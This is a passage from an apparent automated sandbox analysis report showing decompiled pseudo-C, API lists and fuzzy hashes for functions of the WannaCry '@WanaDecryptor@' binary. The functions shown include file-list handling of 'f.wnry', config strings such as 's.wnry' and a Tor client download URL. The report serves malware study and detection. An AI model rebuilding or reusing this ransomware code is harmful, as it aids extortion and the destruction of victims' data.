				_t23 =  *((intOrPtr*)(__ecx + 0x30));
				_t50 = 0;
				_v4 = 1;
				if(_t23 == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t41 =  *(__ecx + 0x24);
					_t45 =  *(__ecx + 0x20);
					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
					if(__ecx != 0) {
						_t50 =  *(__ecx + 4);
					}
					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
					_t23 =  *((intOrPtr*)(_t47 + 0x18));
					if(_t23 != 0) {
						_t23 =  *((intOrPtr*)(_t23 + 4));
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					} else {
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					}
				}
				_t43 = _t47 + 0x10;
				_v16 = _t43;
				 *_t43 = 0x415c00;
				_v4 = 2;
				L00412D52();
				 *_t43 = 0x415bec;
				_v4 = 0xffffffff;
				L00412E3C();
				 *[fs:0x0] = _v12;
				return _t23;
			}

















                                  0x00408b40
                                  0x00408b42
                                  0x00408b4d
                                  0x00408b4e
                                  0x00408b5a
                                  0x00408b5d
                                  0x00408b61
                                  0x00408b67
                                  0x00408b6a
                                  0x00408b6e
                                  0x00408b76
                                  0x00408bd0
                                  0x00408bd3
                                  0x00408b78
                                  0x00408b78
                                  0x00408b7e
                                  0x00408b84
                                  0x00408b8b
                                  0x00408b8d
                                  0x00408b92
                                  0x00408b94
                                  0x00408b94
                                  0x00408ba7
                                  0x00408bad
                                  0x00408bb3
                                  0x00408bc1
                                  0x00408bc7
                                  0x00408bc8
                                  0x00408bc9
                                  0x00408bb5
                                  0x00408bb8
                                  0x00408bb9
                                  0x00408bba
                                  0x00408bba
                                  0x00408bb3
                                  0x00408bd6
                                  0x00408bd9
                                  0x00408bdd
                                  0x00408be5
                                  0x00408bea
                                  0x00408bf1
                                  0x00408bf7
                                  0x00408bff
                                  0x00408c0b
                                  0x00408c15

                                  APIs
                                  • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                  • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785$#2414#640
                                  • String ID:
                                  • API String ID: 2719443296-0
                                  • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                  • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404530 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00404530(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				void* _v36;
				struct tagSIZE _v48;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _t21;
				void* _t22;
				intOrPtr _t41;

				_push(0xffffffff);
				_push(E004137C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
				if(_t21 == 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x58));
					if(_t21 != 0) {
						_push(__ecx);
						L00412DEE();
						_t22 = __ecx + 0x48;
						_push(_t22);
						_v8 = 0;
						L00412DCA();
						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
						_push(_t22);
						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
						L00412DCA();
						 *((char*)(__ecx + 0x5a)) = 1;
						_v32 = 0xffffffff;
						L00412DE8();
					}
				}
				 *[fs:0x0] = _v12;
				return _t21;
			}














                                  0x00404536
                                  0x00404538
                                  0x0040453d
                                  0x0040453e
                                  0x0040454b
                                  0x00404550
                                  0x00404552
                                  0x00404557
                                  0x0040455a
                                  0x0040455f
                                  0x00404564
                                  0x0040456b
                                  0x0040456c
                                  0x00404574
                                  0x0040458d
                                  0x0040459b
                                  0x0040459e
                                  0x004045a3
                                  0x004045a6
                                  0x004045af
                                  0x004045b3
                                  0x004045bb
                                  0x004045c0
                                  0x00404557
                                  0x004045c6
                                  0x004045d0

                                  APIs
                                  • #289.MFC42 ref: 0040455F
                                  • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                  • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                  • #613.MFC42 ref: 004045BB
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#289#613ExtentPoint32Text
                                  • String ID:
                                  • API String ID: 888490064-0
                                  • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                  • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004031A0 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004031A0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135FF);
				_t15 =  *[fs:0x0];
				_push(_t15);
				 *[fs:0x0] = _t30;
				_v20 = __ecx;
				_v4 = 0;
				_t24 = __ecx + 0xec;
				_v16 = _t24;
				 *_t24 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t24 = 0x415bec;
				_t25 = __ecx + 0xe0;
				_v16 = _t25;
				 *_t25 = 0x415c00;
				_v4 = 5;
				L00412D52();
				 *_t25 = 0x415bec;
				_v4 = 1;
				L00412D4C();
				_v4 = 0;
				L00412D3A();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t15;
			}











                                  0x004031a0
                                  0x004031a2
                                  0x004031a7
                                  0x004031ad
                                  0x004031ae
                                  0x004031bc
                                  0x004031c0
                                  0x004031c8
                                  0x004031ce
                                  0x004031d2
                                  0x004031da
                                  0x004031df
                                  0x004031e4
                                  0x004031ea
                                  0x004031f0
                                  0x004031f4
                                  0x004031fc
                                  0x00403201
                                  0x0040320c
                                  0x00403212
                                  0x00403217
                                  0x0040321f
                                  0x00403224
                                  0x0040322b
                                  0x00403233
                                  0x0040323e
                                  0x00403248

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                  • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                  • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                  • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#616#641#693
                                  • String ID:
                                  • API String ID: 1164084425-0
                                  • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                  • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BE90 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 18stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040BE90(char* _a4, char* _a8, char* _a12) {

				strncpy("s.wnry", _a4, 0x63);
				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
				strncpy(0x4221ac, _a12, 0x63);
				return 0;
			}



                                  0x0040be9c
                                  0x0040bead
                                  0x0040bebe
                                  0x0040bec8

                                  APIs
                                  Strings
                                  • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
                                  • s.wnry, xrefs: 0040BE97
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy
                                  • String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
                                  • API String ID: 3301158039-3000313716
                                  • Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                  • Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
                                  • Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                  • Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E00403AF0(void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v12;
				char _v1252;
				void _v2251;
				char _v2252;
				int _v2256;
				signed int _t43;
				signed char _t44;
				signed int _t52;
				signed int _t58;
				signed int _t75;
				signed int _t78;
				struct _IO_FILE* _t103;
				intOrPtr _t111;
				void* _t113;

				_push(0xffffffff);
				_push(E0041369B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				_t103 = fopen("f.wnry", "rt");
				_t113 = _t111 - 0x8c4 + 8;
				if(_t103 != 0) {
					E00401E90( &_v1252, __eflags);
					_v4 = 0;
					_t43 = E00402020( &_v1252, 0, E00403810, 0);
					__eflags = _t43;
					if(_t43 != 0) {
						_t44 =  *(_t103 + 0xc);
						_v2256 = 0;
						__eflags = _t44 & 0x00000010;
						if((_t44 & 0x00000010) == 0) {
							while(1) {
								_v2252 = 0;
								memset( &_v2251, 0, 0xf9 << 2);
								asm("stosw");
								asm("stosb");
								_t52 = fgets( &_v2252, 0x3e7, _t103);
								_t113 = _t113 + 0x18;
								__eflags = _t52;
								if(_t52 == 0) {
									break;
								}
								asm("repne scasb");
								_t75 = 0xbadbac;
								__eflags = 0xbadbac;
								if(0xbadbac != 0) {
									while(1) {
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										L9:
										asm("repne scasb");
										_t78 =  !(_t78 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
											goto L10;
										}
										asm("repne scasb");
										__eflags =  !(_t78 | 0xffffffff) != 1;
										if( !(_t78 | 0xffffffff) != 1) {
											_t58 = E00402650( &_v1252,  &_v2252);
											__eflags = _t58;
											if(_t58 != 0) {
												_t29 =  &_v2256;
												 *_t29 = _v2256 + 1;
												__eflags =  *_t29;
											}
										}
										goto L14;
										L10:
										asm("repne scasb");
										_t75 =  !(_t78 | 0xffffffff) - 1;
										 *((char*)(_t113 + _t75 + 0x13)) = 0;
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										goto L9;
									}
								}
								L14:
								__eflags =  *(_t103 + 0xc) & 0x00000010;
								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
									continue;
								}
								break;
							}
						}
						fclose(_t103);
						__eflags = _v2256;
						_t36 = _v2256 > 0;
						__eflags = _t36;
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						 *[fs:0x0] = _v12;
						return 0 | _t36;
					} else {
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}


















                                  0x00403af6
                                  0x00403af8
                                  0x00403afd
                                  0x00403afe
                                  0x00403b1d
                                  0x00403b21
                                  0x00403b26
                                  0x00403b48
                                  0x00403b5b
                                  0x00403b62
                                  0x00403b67
                                  0x00403b69
                                  0x00403b9b
                                  0x00403b9e
                                  0x00403ba2
                                  0x00403ba4
                                  0x00403bb2
                                  0x00403bbd
                                  0x00403bc1
                                  0x00403bc3
                                  0x00403bc5
                                  0x00403bd1
                                  0x00403bd3
                                  0x00403bd6
                                  0x00403bd8
                                  0x00000000
                                  0x00000000
                                  0x00403be7
                                  0x00403beb
                                  0x00403beb
                                  0x00403bec
                                  0x00403bee
                                  0x00403bf7
                                  0x00403bfb
                                  0x00403bfc
                                  0x00403c01
                                  0x00000000
                                  0x00000000
                                  0x00403c03
                                  0x00403c0c
                                  0x00403c10
                                  0x00403c11
                                  0x00403c16
                                  0x00000000
                                  0x00000000
                                  0x00403c35
                                  0x00403c39
                                  0x00403c3a
                                  0x00403c48
                                  0x00403c4d
                                  0x00403c4f
                                  0x00403c51
                                  0x00403c51
                                  0x00403c51
                                  0x00403c51
                                  0x00403c4f
                                  0x00000000
                                  0x00403c18
                                  0x00403c21
                                  0x00403c25
                                  0x00403c26
                                  0x00403bf7
                                  0x00403bfb
                                  0x00403bfc
                                  0x00403c01
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403c01
                                  0x00403bee
                                  0x00403c55
                                  0x00403c55
                                  0x00403c59
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403c59
                                  0x00403c60
                                  0x00403c62
                                  0x00403c71
                                  0x00403c73
                                  0x00403c73
                                  0x00403c7f
                                  0x00403c8a
                                  0x00403c9a
                                  0x00403ca7
                                  0x00403b6b
                                  0x00403b72
                                  0x00403b7d
                                  0x00403b83
                                  0x00403b8d
                                  0x00403b9a
                                  0x00403b9a
                                  0x00403b28
                                  0x00403b33
                                  0x00403b40
                                  0x00403b40

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fopen
                                  • String ID: f.wnry
                                  • API String ID: 1432627528-2448388194
                                  • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                  • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				char _v520;
				void _v816;
				struct _SECURITY_ATTRIBUTES* _v820;
				void* _t15;
				struct _SECURITY_ATTRIBUTES* _t37;
				CHAR* _t38;
				void* _t39;
				CHAR* _t40;
				struct _SECURITY_ATTRIBUTES** _t42;
				struct _SECURITY_ATTRIBUTES** _t44;

				_t40 = _a4;
				CreateDirectoryA(_t40, 0);
				_t38 = _a8;
				_t15 = E00412920(_t38, _a12);
				_t28 = _t15;
				_t42 =  &(( &_v820)[2]);
				if(_t15 != 0) {
					_v820 = 0;
					memset( &_v816, 0, 0x4a << 2);
					E00412940(_t28, 0xffffffff,  &_v820);
					_t37 = _v820;
					_t44 =  &(_t42[6]);
					if(_t37 > 0) {
						_t39 = 0;
						if(_t37 > 0) {
							do {
								E00412940(_t28, _t39,  &_v820);
								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
								E004129E0(_t28, _t39,  &_v520);
								_t44 =  &(_t44[0xa]);
								_t39 = _t39 + 1;
							} while (_t39 < _t37);
						}
						E00412A00(_t28);
						return 1;
					} else {
						return 0;
					}
				} else {
					DeleteFileA(_t38);
					return 0;
				}
			}













                                  0x0040b6a8
                                  0x0040b6b4
                                  0x0040b6c1
                                  0x0040b6ca
                                  0x0040b6cf
                                  0x0040b6d1
                                  0x0040b6d6
                                  0x0040b6f7
                                  0x0040b6ff
                                  0x0040b709
                                  0x0040b70e
                                  0x0040b712
                                  0x0040b717
                                  0x0040b726
                                  0x0040b72a
                                  0x0040b72c
                                  0x0040b733
                                  0x0040b74e
                                  0x0040b75d
                                  0x0040b762
                                  0x0040b765
                                  0x0040b766
                                  0x0040b72c
                                  0x0040b76b
                                  0x0040b77f
                                  0x0040b71c
                                  0x0040b725
                                  0x0040b725
                                  0x0040b6d8
                                  0x0040b6d9
                                  0x0040b6eb
                                  0x0040b6eb

                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,0019FA30), ref: 0040B6B4
                                  • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDeleteDirectoryFile
                                  • String ID: %s\%s
                                  • API String ID: 3195586388-4073750446
                                  • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                  • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D150 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
				char _v500;
				intOrPtr _v508;
				char _v520;
				char _v521;
				char _v528;
				char _v529;
				intOrPtr _v536;
				signed int _t42;
				short _t46;
				signed int _t48;
				int _t62;
				intOrPtr* _t63;
				intOrPtr _t67;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t89;
				void* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;

				_t89 = __edi;
				_t63 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t99 =  &_v508 + 8;
				_t42 = rand();
				asm("cdq");
				_t94 = 0;
				_t81 = _t42 % 0xc8 + 0x1f;
				_v508 = _t81;
				if(_t81 > 0) {
					do {
						_t62 = rand();
						_t81 = _v508;
						 *(_t99 + _t94 + 0x14) = _t62;
						_t94 = _t94 + 1;
					} while (_t94 < _t81);
				}
				_t95 = _a16;
				_t97 = _t99 + _t81 - 0xb;
				if(_t95 != 0) {
					_push(_t89);
					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
					_t99 = _t99 + 0xc;
					asm("movsw");
					asm("movsb");
					_t81 = _v508;
					_t95 = _a16;
				}
				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
				_t82 = _t81 + 1;
				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
				_t83 = _t82 + 1;
				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
				_v508 = _t83 + 1;
				_t46 = E00412B00(_t97, 0x1f);
				_t67 = _v508;
				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
				if(_t48 < 0) {
					L12:
					return _t48 | 0xffffffff;
				} else {
					E0040D5A0(_t63, _t97);
					_push( &_v528);
					_push( &_v520);
					_push( &_v521);
					_v528 = 0x1f4;
					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
						goto L12;
					} else {
						if(_t95 == 0) {
							L10:
							return 0;
						} else {
							_push(1);
							_push(_v536);
							_push( &_v528);
							_push(2);
							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
								goto L10;
							} else {
								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
							}
						}
					}
				}
			}
























                                  0x0040d150
                                  0x0040d159
                                  0x0040d15b
                                  0x0040d15d
                                  0x0040d163
                                  0x0040d168
                                  0x0040d16b
                                  0x0040d170
                                  0x0040d176
                                  0x0040d17a
                                  0x0040d17f
                                  0x0040d183
                                  0x0040d185
                                  0x0040d185
                                  0x0040d18a
                                  0x0040d18e
                                  0x0040d192
                                  0x0040d193
                                  0x0040d185
                                  0x0040d197
                                  0x0040d19e
                                  0x0040d1a4
                                  0x0040d1a6
                                  0x0040d1b7
                                  0x0040d1b7
                                  0x0040d1b9
                                  0x0040d1bb
                                  0x0040d1bc
                                  0x0040d1c0
                                  0x0040d1c7
                                  0x0040d1d6
                                  0x0040d1e1
                                  0x0040d1e5
                                  0x0040d1e9
                                  0x0040d1ea
                                  0x0040d1ef
                                  0x0040d1f3
                                  0x0040d1f8
                                  0x0040d201
                                  0x0040d215
                                  0x0040d21a
                                  0x0040d297
                                  0x0040d2a1
                                  0x0040d21c
                                  0x0040d21f
                                  0x0040d22a
                                  0x0040d233
                                  0x0040d234
                                  0x0040d237
                                  0x0040d244
                                  0x0040d292
                                  0x00000000
                                  0x0040d24d
                                  0x0040d24f
                                  0x0040d282
                                  0x0040d28b
                                  0x0040d251
                                  0x0040d257
                                  0x0040d25d
                                  0x0040d25e
                                  0x0040d25f
                                  0x0040d268
                                  0x00000000
                                  0x0040d26a
                                  0x0040d27d
                                  0x0040d27d
                                  0x0040d268
                                  0x0040d24f
                                  0x0040d244

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                  • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004108A0 Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
				long _t28;
				signed int _t38;
				void* _t44;
				long* _t45;
				long _t46;
				char _t47;

				_t47 = _a12;
				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
					_t45 = _a16;
					_t44 = 0;
					_t38 = 0;
